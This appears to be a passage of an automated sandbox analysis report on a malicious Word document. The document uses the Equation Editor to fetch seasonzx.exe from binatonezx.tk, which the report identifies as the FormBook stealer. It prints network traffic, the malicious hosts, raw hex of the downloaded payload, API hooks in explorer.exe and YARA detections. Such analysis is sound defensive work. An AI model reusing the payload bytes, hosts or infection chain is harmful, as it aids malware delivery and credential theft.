                                               Oct 27, 2021 16:42:18.314254999 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.314289093 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.314304113 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.314333916 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.314354897 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.314395905 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.314407110 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.314443111 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.314457893 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.314497948 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.314507961 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.314537048 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.314559937 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.314594984 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.314610004 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.314637899 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.314662933 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.314706087 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.314716101 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.314747095 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.314769983 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.314811945 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.314822912 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.314857960 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.314877033 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.314920902 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.314941883 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.314975977 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.314991951 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.315016031 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.315049887 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.315085888 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.315102100 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.315133095 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.315152884 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.315192938 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.315202951 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.315237045 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.315254927 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.315290928 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.315305948 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.315330982 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.315355062 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.315388918 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.315406084 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.315435886 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.315457106 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.315499067 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.315510035 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.315537930 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.315560102 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.315593958 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.315610886 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.315646887 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.315679073 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.315689087 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.315716982 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.315774918 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.330625057 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.330676079 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.330724001 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.330737114 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.330751896 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.330770969 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.330807924 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.330856085 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.330888987 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.330900908 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.330945015 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.330986977 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.331005096 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.331027031 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.331062078 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.331109047 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.331120014 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.331151009 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.342921019 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.342977047 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.342998981 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.343063116 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.343075037 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.343106985 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.343133926 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.343170881 CEST | 80 | 49165 | 2.56.59.211 | 192.168.2.22
                                               Oct 27, 2021 16:42:18.343187094 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:18.343215942 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211
                                               Oct 27, 2021 16:42:19.291462898 CEST | 49165 | 80 | 192.168.2.22 | 2.56.59.211

                                              UDP Packets

                                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                               Oct 27, 2021 16:42:17.869247913 CEST | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                                               Oct 27, 2021 16:42:17.888603926 CEST | 53 | 52167 | 8.8.8.8 | 192.168.2.22
                                               Oct 27, 2021 16:44:14.257828951 CEST | 50591 | 53 | 192.168.2.22 | 8.8.8.8
                                               Oct 27, 2021 16:44:14.508419037 CEST | 53 | 50591 | 8.8.8.8 | 192.168.2.22

                                              DNS Queries

                                               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                               Oct 27, 2021 16:42:17.869247913 CEST | 192.168.2.22 | 8.8.8.8 | 0x567b | Standard query (0) | binatonezx.tk | A (IP address) | IN (0x0001)
                                               Oct 27, 2021 16:44:14.257828951 CEST | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.lenovoidc.com | A (IP address) | IN (0x0001)

                                              DNS Answers

                                               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                               Oct 27, 2021 16:42:17.888603926 CEST | 8.8.8.8 | 192.168.2.22 | 0x567b | No error (0) | binatonezx.tk | | 2.56.59.211 | A (IP address) | IN (0x0001)
                                               Oct 27, 2021 16:44:14.508419037 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | Name error (3) | www.lenovoidc.com | none | none | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • binatonezx.tk

                                              HTTP Packets

                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                               0 | 192.168.2.22 | 49165 | 2.56.59.211 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                               Timestamp | kBytes transferred | Direction | Data
                                               Oct 27, 2021 16:42:17.944622040 CEST | 0 | OUT | GET /seasonzx.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: binatonezx.tk
                                              Connection: Keep-Alive
                                               Oct 27, 2021 16:42:17.983454943 CEST | 2 | IN | HTTP/1.1 200 OK
                                              Date: Wed, 27 Oct 2021 14:42:17 GMT
                                              Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips
                                              Last-Modified: Wed, 27 Oct 2021 07:19:00 GMT
                                              ETag: "80800-5cf50687391d8"
                                              Accept-Ranges: bytes
                                              Content-Length: 526336
                                              Vary: User-Agent
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 a4 78 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 07 00 00 08 00 00 00 00 00 00 3e 1d 08 00 00 20 00 00 00 20 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 1c 08 00 4f 00 00 00 00 20 08 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 fd 07 00 00 20 00 00 00 fe 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 20 08 00 00 06 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 1d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 10 be 00 00 c4 be 00 00 03 00 00 00 74 01 00 06 d4 7c 01 00 18 a0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 17 00 00 0a 00 00 2a 00 00 1b 30 02 00 48 00 00 00 01 00 00 11 14 80 01 00 00 04 73 18 00 00 0a 80 02 00 00 04 00 7e 02 00 00 04 0a 16 0b 06 12 01 28 19 00 00 
0a 00 00 7e 01 00 00 04 14 fe 01 0c 08 2c 0a 73 01 00 00 06 80 01 00 00 04 00 de 0b 07 2c 07 06 28 1a 00 00 0a 00 dc 2a 01 10 00 00 02 00 19 00 23 3c 00 0b 00 00 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 03 00 00 11 00 73 0b 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 04 00 00 11 00 73 52 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 05 00 00 11 00 73 54 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 06 00 00 11 00 73 a1 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 07 00 00 11 00 73 cf 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 00 73 da 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 09 00 00 11 00 73 80 00 00 06 0a 2b 00 06 2a 8a 02 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 72 01 00 00 70 7d 05 00 00 04 2a 7a 02 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 03 7d 05 00 00 04 2a 96 02 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 03 7d 05 00 00 04 02 04 7d 03 00 00 04 2a b2 02
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELxa0> @ `@O @ H.textD `.rsrc @@.reloc@@B Ht|&(*0Hs~(~,s,(*#<0+*0s+*0sR+*0sT+*0s+*0s+*0s+*0s+*}}(rp}*z}}(}*}}(}}*
                                              Oct 27, 2021 16:42:17.983525991 CEST3INData Raw: 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 03 7d 05 00 00 04 02 04 7d 03 00 00 04 02 05 7d 04 00 00 04 2a 13 30 01 00 0c 00 00 00 0a 00 00 11 00 02 7b 05 00 00 04 0a 2b 00 06 2a 42 00 02 03 7d 05 00 00 04 02 16 7d 0a 00 00
                                              Data Ascii: }}(}}}*0{+*B}}*0{+*&}*0{+*&}*0{+*:t}*0{+*&}*0$
                                              Oct 27, 2021 16:42:17.983601093 CEST4INData Raw: 77 00 00 01 28 2f 00 00 0a 13 07 00 38 28 01 00 00 11 06 d0 78 00 00 01 28 27 00 00 0a 6f 28 00 00 0a 13 1d 11 1d 2c 1d 00 03 09 11 05 6f 22 00 00 0a a5 78 00 00 01 6c 28 2f 00 00 0a 13 07 00 38 f4 00 00 00 11 06 d0 79 00 00 01 28 27 00 00 0a 6f
                                              Data Ascii: w(/8(x('o(,o"xl(/8y('o(,o"yn(08z('o(,o"z(08('o( ,(o"to"ti(1+NA(
                                              Oct 27, 2021 16:42:17.983633041 CEST6INData Raw: 00 04 14 fe 03 0a 06 2c 18 02 7b 0f 00 00 04 02 fe 06 51 00 00 06 73 1d 01 00 06 6f a0 00 00 06 00 02 03 75 07 00 00 02 7d 0f 00 00 04 02 7b 0f 00 00 04 14 fe 03 0b 07 2c 18 02 7b 0f 00 00 04 02 fe 06 51 00 00 06 73 1d 01 00 06 6f 9f 00 00 06 00
                                              Data Ascii: ,{Qsou}{,{Qso*0{+*0!{,rpsFz}*0{+*0!{,rpsFz}*0'{
                                              Oct 27, 2021 16:42:17.983678102 CEST7INData Raw: 02 03 7d 0e 00 00 04 2a 00 01 10 00 00 02 00 19 00 a8 c1 00 15 00 00 00 00 1b 30 05 00 7f 01 00 00 23 00 00 11 00 02 28 3a 00 00 06 7e 48 00 00 0a 28 58 00 00 0a 13 05 11 05 2c 08 14 13 06 38 5d 01 00 00 02 02 7c 10 00 00 04 28 4a 00 00 06 00 72
                                              Data Ascii: }*0#(:~H(X,8]|(Jrrp(:(Is\s\{oSoT8oUt((L,8,rpo]&rpo]&,{o(No
                                              Oct 27, 2021 16:42:17.983725071 CEST9INData Raw: 04 00 70 6f 5d 00 00 0a 26 14 13 0a 03 13 0d 11 0d 2c 1e 00 02 7b 11 00 00 04 6f 19 00 00 06 02 11 09 28 4e 00 00 06 6f 05 01 00 06 13 0a 00 2b 21 00 02 7b 11 00 00 04 6f 19 00 00 06 02 09 25 17 58 0d 11 09 28 4f 00 00 06 6f 05 01 00 06 13 0a 00
                                              Data Ascii: po]&,{o(No+!{o%X(Oo o^rpo_(Po`(eo]&oZ:8u+,o[{oSoT8oUt(rpoWo,8(K
                                              Oct 27, 2021 16:42:17.983750105 CEST10INData Raw: 80 00 00 00 03 72 4e 08 00 70 6f 56 00 00 0a 2d 12 03 72 4e 08 00 70 6f 57 00 00 0a a5 6f 00 00 01 2b 01 16 0d 09 2c 04 16 0b 2b 58 03 72 e6 04 00 70 6f 56 00 00 0a 2d 12 03 72 e6 04 00 70 6f 57 00 00 0a a5 6f 00 00 01 2b 01 16 13 04 11 04 2c 04
                                              Data Ascii: rNpoV-rNpoWo+,+XrpoV-rpoWo+,+.rhpoV-rhpoWo+,++*0P'r:poWtkr0p(Ir~poW-rpoWrs+*0U'r
                                              Oct 27, 2021 16:42:17.983773947 CEST11INData Raw: 73 46 00 00 0a 7a 11 05 16 9a 28 2c 00 00 0a 6f 7a 00 00 0a 6f 40 00 00 0a 13 06 11 05 17 9a 6f 40 00 00 0a 13 07 11 05 17 9a 28 2c 00 00 0a 6f 7a 00 00 0a 6f 40 00 00 0a 13 08 11 06 13 0c 11 0c 13 0b 11 0b 28 7e 01 00 06 13 0d 11 0d 20 97 ae 71
                                              Data Ascii: sFz(,ozo@o@(,ozo@(~ qF5* _K6;+ S7.g+ qF;8Q 5 ;+ .s8, pq.+ n..8rFp(X:8r^p(X-s8rfp(X:
                                              Oct 27, 2021 16:42:17.983812094 CEST13INData Raw: 6f 62 00 00 0a 00 11 09 6f 86 00 00 0a 26 00 00 02 17 7d 1f 00 00 04 2a 00 13 30 03 00 0e 00 00 00 31 00 00 11 00 02 03 14 6f 8c 00 00 0a 0a 2b 00 06 2a 00 00 1b 30 03 00 da 03 00 00 32 00 00 11 00 02 6f 4f 00 00 0a 17 fe 01 16 fe 01 0c 08 2c 0b
                                              Data Ascii: obo&}*01o+*02oO,r psFz,i(roSoT+\oUt(r|poWo2(,+rpoWr,rpsKzoZ-u+
                                              Oct 27, 2021 16:42:17.983933926 CEST14INData Raw: 16 8c 72 00 00 01 a2 17 6f 93 00 00 0a 26 06 19 8d 11 00 00 01 25 16 72 90 0f 00 70 a2 25 17 16 8c 72 00 00 01 a2 25 18 16 8c 72 00 00 01 a2 17 6f 93 00 00 0a 26 06 19 8d 11 00 00 01 25 16 72 ac 0f 00 70 a2 25 17 17 8c 72 00 00 01 a2 25 18 17 8c
                                              Data Ascii: ro&%rp%r%ro&%rp%r%ro&%rp%r%ro&%rp%r%ro&%rp%r%ro&%rp%r%r
                                              Oct 27, 2021 16:42:18.010915041 CEST16INData Raw: 17 0b 07 2c 0c 00 72 13 16 00 70 73 4b 00 00 0a 7a 02 03 16 9a 28 7a 00 00 06 00 02 28 66 00 00 0a 74 03 00 00 02 0a 06 72 ae 16 00 70 03 16 9a 28 49 00 00 0a 6f 62 00 00 0a 00 02 06 03 28 7f 00 00 06 0c 2b 00 08 2a 00 13 30 02 00 1c 00 00 00 02
                                              Data Ascii: ,rpsKz(z(ftrp(Iob(+*0rpo,rpsKz*075r@psorpo~od(+*0m4sorUpk('o&orpk


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                               Function Name | Hook Type | Active in Processes
                                               PeekMessageA | INLINE | explorer.exe
                                               PeekMessageW | INLINE | explorer.exe
                                               GetMessageW | INLINE | explorer.exe
                                               GetMessageA | INLINE | explorer.exe

                                              Processes

                                              Process: explorer.exe, Module: USER32.dll
                                               Function Name | Hook Type | New Data
                                               PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEB
                                               PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEB
                                               GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEB
                                               GetMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEB

                                              Statistics

                                              CPU Usage


                                              Memory Usage


                                              High Level Behavior Distribution


                                              Behavior


                                              System Behavior

                                              General

                                              Start time:16:42:17
                                              Start date:27/10/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                              Imagebase:0x13f600000
                                              File size:1423704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:16:42:19
                                              Start date:27/10/2021
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:16:42:21
                                              Start date:27/10/2021
                                              Path:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Imagebase:0x1100000
                                              File size:526336 bytes
                                              MD5 hash:9227463FFB6E37D271919E06D175EDA7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 23%, ReversingLabs
                                              Reputation:low

                                              General

                                              Start time:16:42:25
                                              Start date:27/10/2021
                                              Path:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Imagebase:0x1100000
                                              File size:526336 bytes
                                              MD5 hash:9227463FFB6E37D271919E06D175EDA7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:16:42:27
                                              Start date:27/10/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xffa10000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
